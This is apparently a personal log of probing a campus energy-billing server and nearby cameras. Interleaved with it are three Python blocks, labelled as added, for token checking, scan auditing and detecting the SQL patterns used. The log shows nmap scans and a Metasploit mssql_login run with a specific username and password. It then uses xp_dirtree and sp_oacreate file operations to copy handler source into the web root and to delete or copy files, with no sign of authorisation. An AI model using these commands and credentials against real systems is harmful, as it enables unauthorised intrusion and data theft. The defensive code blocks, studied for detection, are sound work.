2024-10-01 15:37:08
I don't know which senior before me scanned out that the intranet IP of the energy control system is 10.168.55.50; impressive skills either way.

With the IP in hand, the routine first step is an nmap scan:

```
Nmap scan report for 10.168.55.50
Host is up (0.0049s latency).
Not shown: 976 closed tcp ports (conn-refused)
PORT STATE SERVICE
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
1521/tcp open oracle
3389/tcp filtered ms-wbt-server
8080/tcp open http-proxy
8081/tcp open blackice-icecap
8085/tcp open unknown
8089/tcp open unknown
8099/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
```

Port 8085 here is a TCP port whose protocol turns out to be HTTP. Opening it shows the back end of the electricity billing management system directly. The login page on port 80, however, only authenticates and then redirects to port 8085, so the authentication is effectively useless.
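An added example, not part of the original post and not the billing system's code: the weakness described above is a back end that serves pages to any caller and relies on a separate login page only for the redirect. The code contrasts that with a back end that verifies a signed, expiring token on every request; `SECRET`, the token format and the handler names are assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import time

# Assumption: a secret known only to the login service and the back end.
SECRET = b"constructed-demo-secret"
TOKEN_TTL = 900  # token lifetime in seconds


def issue_token(user, now=None):
    """Issued by the login service (the port-80 side) after a successful login."""
    issued = now if now is not None else time.time()
    payload = f"{user}|{int(issued) + TOKEN_TTL}".encode()
    mac = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return (base64.urlsafe_b64encode(payload).decode() + "." +
            base64.urlsafe_b64encode(mac).decode())


def verify_token(token, now=None):
    """Return the user name if the token is authentic and unexpired, else None."""
    try:
        p64, m64 = token.split(".")
        payload = base64.urlsafe_b64decode(p64.encode())
        mac = base64.urlsafe_b64decode(m64.encode())
        user, expires = payload.decode().rsplit("|", 1)
        expires = int(expires)
    except (ValueError, AttributeError, UnicodeDecodeError):
        return None  # malformed token
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return None  # payload was altered or signed with another key
    current = now if now is not None else time.time()
    if current >= expires:
        return None  # expired
    return user


def backend_vulnerable(path, headers):
    """The pattern from the post: the back end assumes callers came via the login page."""
    return 200, f"admin page {path}"


def backend_hardened(path, headers, now=None):
    """The back end itself checks the token on every request."""
    auth = headers.get("Authorization", "")
    token = auth[len("Bearer "):] if auth.startswith("Bearer ") else None
    user = verify_token(token, now) if token else None
    if user is None:
        return 401, "login required"
    return 200, f"admin page {path} for {user}"


if __name__ == "__main__":
    tok = issue_token("alice", now=1000)
    print(backend_vulnerable("/admin", {}))              # served without any login
    print(backend_hardened("/admin", {}, now=1000))      # rejected
    print(backend_hardened("/admin", {"Authorization": "Bearer " + tok}, now=1000))
```
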
Next, a look at traceroute:

```
traceroute to 10.168.55.50 (10.168.55.50), 30 hops max, 60 byte packets
1 _gateway (10.0.0.1) 3.217 ms 2.980 ms 2.926 ms
2 10.194.255.254 (10.194.255.254) 5.266 ms 4.524 ms 4.909 ms
3 172.16.14.49 (172.16.14.49) 4.665 ms 4.644 ms 4.816 ms
4 172.16.14.6 (172.16.14.6) 3.737 ms 3.632 ms 4.160 ms
5 172.16.14.9 (172.16.14.9) 50.871 ms 50.847 ms 50.905 ms
6 172.16.11.21 (172.16.11.21) 5.327 ms 3.495 ms 3.551 ms
7 10.168.55.1 (10.168.55.1) 3.600 ms 4.140 ms 4.099 ms
8 10.168.55.50 (10.168.55.50) 4.229 ms 4.216 ms 4.204 ms
```

The routing structure of the campus network is clearly visible. The 10.194 segment is the campus network's large internal segment, after which the path hops into the 172.16.14 segment, possibly one of its subnets?

So let's go on and see what this 10.168 segment looks like:
```
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-01 15:50 CST
Nmap done: 256 IP addresses (72 hosts up) scanned in 161.85 seconds
```
Sigh, how does someone manage to crash this intranet system?

```
Nmap scan report for 10.168.55.50
Host is up (0.0067s latency).
Not shown: 976 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
7/tcp open echo
9/tcp open discard?
13/tcp open daytime
| fingerprint-strings:
| NULL:
|_ 10:37:37 2024/10/7
17/tcp open qotd Windows qotd (English)
19/tcp open chargen
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
22/tcp filtered ssh
53/tcp open domain Cloudflare public DNS
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2024-10-07T02:40:28+00:00; +15m00s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=WMSvc-WINDOWS-ZE8CXVR
| Not valid before: 2013-11-15T04:11:44
|_Not valid after: 2023-11-13T04:11:44
1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows)
3389/tcp filtered ms-wbt-server
8080/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
8081/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
8085/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
8089/tcp open unknown
8099/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port13-TCP:V=7.95%I=7%D=10/7%Time=670345ED%P=x86_64-pc-linux-gnu%r(NULL
SF:,13,"10:37:37\x202024/10/7\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14m59s
```
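An added example, not from the original post: a small auditor for nmap's normal output that turns a report like the one above into hardening findings (legacy simple TCP services, cleartext protocols, reachable database listeners, unsupported server versions, expired certificates). The sample report, the 192.0.2.x addresses, `SCAN_TIME` and the `UNSUPPORTED` list are constructed for illustration.

```python
import re
from datetime import datetime

# Constructed sample in nmap's normal output format (-sV plus the ssl-cert script).
SAMPLE = """\
Nmap scan report for 192.0.2.10
Host is up (0.0067s latency).
PORT      STATE    SERVICE    VERSION
7/tcp     open     echo
19/tcp    open     chargen
21/tcp    open     ftp        Microsoft ftpd
22/tcp    filtered ssh
1433/tcp  open     ms-sql-s   Microsoft SQL Server 2000 8.00.194.00; RTM
| ssl-cert: Subject: commonName=EXAMPLE-HOST
| Not valid before: 2013-11-15T04:11:44
|_Not valid after:  2023-11-13T04:11:44
8085/tcp  open     http       Microsoft IIS httpd 7.5
Nmap scan report for 192.0.2.11
Host is up (0.013s latency).
PORT     STATE    SERVICE
23/tcp   open     telnet
3389/tcp filtered ms-wbt-server
"""
SCAN_TIME = datetime(2024, 10, 7)  # constructed scan date used for expiry checks

SIMPLE_TCP = {7, 9, 13, 17, 19}    # echo, discard, daytime, qotd, chargen
DATABASE = {1433: "MS SQL", 1521: "Oracle TNS", 3306: "MySQL"}
CLEARTEXT = {21: "FTP", 23: "Telnet"}
# Illustrative list of version substrings that are past vendor support.
UNSUPPORTED = {"SQL Server 2000": "SQL Server 2000", "IIS httpd 7.5": "IIS 7.5"}

HOST_RE = re.compile(r"^Nmap scan report for (?:.* \()?([^\s()]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)\s*(.*)$")
CERT_RE = re.compile(r"Not valid after:\s*(\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)")


def parse(text):
    """Return {host: [port records]}; script output is attached to the preceding port."""
    hosts, host, last = {}, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, last = m.group(1), None
            hosts[host] = []
            continue
        m = PORT_RE.match(line)
        if m and host:
            last = {"port": int(m.group(1)), "state": m.group(2),
                    "service": m.group(3), "version": m.group(4).strip(),
                    "cert_expiry": None}
            hosts[host].append(last)
            continue
        m = CERT_RE.search(line)
        if m and last is not None:
            last["cert_expiry"] = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
    return hosts


def audit(hosts, scan_time):
    """Return (host, port, finding) tuples for open ports only."""
    findings = []
    for host, ports in hosts.items():
        for p in ports:
            if p["state"] != "open":
                continue  # filtered/closed ports are not reachable services
            n = p["port"]
            if n in SIMPLE_TCP:
                findings.append((host, n, "legacy simple TCP service enabled"))
            if n in DATABASE:
                findings.append((host, n, f"{DATABASE[n]} listener reachable from the scanner's network"))
            if n in CLEARTEXT:
                findings.append((host, n, f"{CLEARTEXT[n]} sends credentials in cleartext"))
            for needle, name in UNSUPPORTED.items():
                if needle in p["version"]:
                    findings.append((host, n, f"{name} is out of vendor support"))
            if p["cert_expiry"] and p["cert_expiry"] < scan_time:
                day = p["cert_expiry"].date().isoformat()
                findings.append((host, n, f"certificate expired on {day}"))
    return findings


def run_sample():
    return audit(parse(SAMPLE), SCAN_TIME)


if __name__ == "__main__":
    for host, port, finding in run_sample():
        print(f"{host}:{port}  {finding}")
```
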
```
msfconsole
search mssql_login
use 0
show options
set RHOSTS 10.168.55.50
set RPORT 1433
set USERNAME bak_user
set PASSWORD whoisyourdaddy
set CreateSession true
exploit
sessions -i 1
query_interactive
```

```sql
exec xp_dirtree "PATH HERE",1,1;
```

Look for H_LoginCheck.ashx:

E:/XDSite/XDWeb/XDWeb/HandlerFiles/H_LoginCheck.ashx

```sql
exec sp_oamethod @ffffffff0x,'copyfile',null,'E:/XDSite/XDWeb/XDWeb/HandlerFiles/H_LoginCheck.ashx','E:/XDSite/XDWeb/XDWeb/HandlerFiles/H_LoginCheck.txt';
```

http://10.168.55.50/HandlerFiles/H_LoginCheck.txt

E:/XDSite/XDWeb/XDWeb/bin/ - BLL_Business/Common/DAL/BDU_Entity .pdb / dll

```sql
-- This can be used to delete a file
declare @result int
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'deletefile',null,'E:\\WEB_Server_SBTS\\Scripts\\B.txt'
exec sp_oadestroy @ffffffff0x;
-- Copy a file
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'copyfile',null,'E:\\ICCARD.rar','E:\\WEB_Server_SBTS\\Scripts\\B.txt';
```

```
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
3306/tcp open mysql
3389/tcp filtered ms-wbt-server
5985/tcp open wsman
8001/tcp open vcom-tunnel
```

http://10.168.55.32:8001/ui/#/login
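An added example, not from the original post: the MSSQL statements shown earlier for 10.168.55.50 use `xp_dirtree` to list directories and `sp_oacreate`/`sp_oamethod` with `scripting.filesystemobject` to copy a handler to a `.txt` name inside the web directory, and this detector flags those patterns in captured T-SQL. The event list, login names, `WEB_ROOTS` path and `SERVER_SIDE` extension set are constructed assumptions.

```python
import re

# Assumptions for this example: the site's document root and the extensions
# the web server executes or refuses to hand out as plain text.
WEB_ROOTS = ["D:/Site/App"]
SERVER_SIDE = {".ashx", ".aspx", ".asmx", ".config", ".cs"}

# Constructed statement log: (timestamp, login, T-SQL text).
EVENTS = [
    ("2024-10-07T10:41:02", "app_user", "select name from meters where id = 7"),
    ("2024-10-07T10:42:10", "bak_login", "exec xp_dirtree 'D:/Site/App',1,1;"),
    ("2024-10-07T10:43:30", "bak_login",
     "declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out "
     "exec sp_oamethod @o,'copyfile',null,"
     "'D:/Site/App/Handlers/Login.ashx','D:/Site/App/Handlers/Login.txt';"),
    ("2024-10-07T10:44:00", "bak_login",
     "declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out "
     r"exec sp_oamethod @o,'deletefile',null,'D:\Site\App\Scripts\B.txt'"),
]

DIRTREE = re.compile(r"\bxp_dirtree\b", re.I)
OA_CREATE = re.compile(r"sp_oacreate\s+'scripting\.filesystemobject'", re.I)
# Captures the method name and the quoted arguments that follow the NULL return slot.
OA_METHOD = re.compile(
    r"sp_oamethod\s+@\w+\s*,\s*'(\w+)'\s*,\s*null((?:\s*,\s*'[^']*')+)", re.I)


def norm(path):
    """Lower-case, forward slashes only, repeated separators collapsed."""
    return re.sub(r"/+", "/", path.replace("\\", "/")).lower()


def ext(path):
    """File extension of a normalised path, including the dot ('' if none)."""
    name = path.rsplit("/", 1)[-1]
    return "." + name.rsplit(".", 1)[1] if "." in name else ""


def in_web_root(path):
    return any(path.startswith(norm(root) + "/") for root in WEB_ROOTS)


def inspect(statement):
    """Return alert strings for one T-SQL statement."""
    alerts = []
    if DIRTREE.search(statement):
        alerts.append("directory enumeration via xp_dirtree")
    if OA_CREATE.search(statement):
        alerts.append("FileSystemObject created via sp_OACreate")
    for method, raw_args in OA_METHOD.findall(statement):
        args = [norm(a) for a in re.findall(r"'([^']*)'", raw_args)]
        method = method.lower()
        if method == "copyfile" and len(args) == 2:
            src, dst = args
            if in_web_root(dst) and ext(src) in SERVER_SIDE and ext(dst) not in SERVER_SIDE:
                # Renaming to a static extension makes the server hand out the source.
                alerts.append(f"server-side source exposed: {src} copied to {dst}")
            elif in_web_root(dst):
                alerts.append(f"file copied into web root: {dst}")
        elif method == "deletefile" and args:
            alerts.append(f"file deleted via FileSystemObject: {args[0]}")
    return alerts


def detect(events):
    """Return (timestamp, login, alert) for every alert raised by the events."""
    return [(ts, login, a) for ts, login, sql in events for a in inspect(sql)]


if __name__ == "__main__":
    for ts, login, alert in detect(EVENTS):
        print(ts, login, alert)
```
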
```
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
```

http://10.168.55.26/doc/page/login.asp?_1727769895646

Continuing with a more detailed scan: `nmap --script vuln -T4 10.168.55.26`

```
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
```

Trying to make use of the 554 rtsp port:

> Never mind, not trying that. I searched for hikvision vulnerability instead and found jorhelp/Ingram

But then the detailed scan results from above came in: `nmap -T4 -A -v 10.168.55.26`

```
22/tcp filtered ssh
80/tcp open http HikVision NVR or camera http config
|_http-server-header: Webs
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp Apple AirTunes rtspd
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
3389/tcp filtered ms-wbt-server
8000/tcp open ipcam Hikvision IPCam control port
Service Info: OS: Mac OS X; Device: webcam; CPE: cpe:/o:apple:mac_os_x
```

Scanning with the tool mentioned above:

```
# targets.txt:
10.168.55.26
```

There don't seem to be any exploitable vulnerabilities.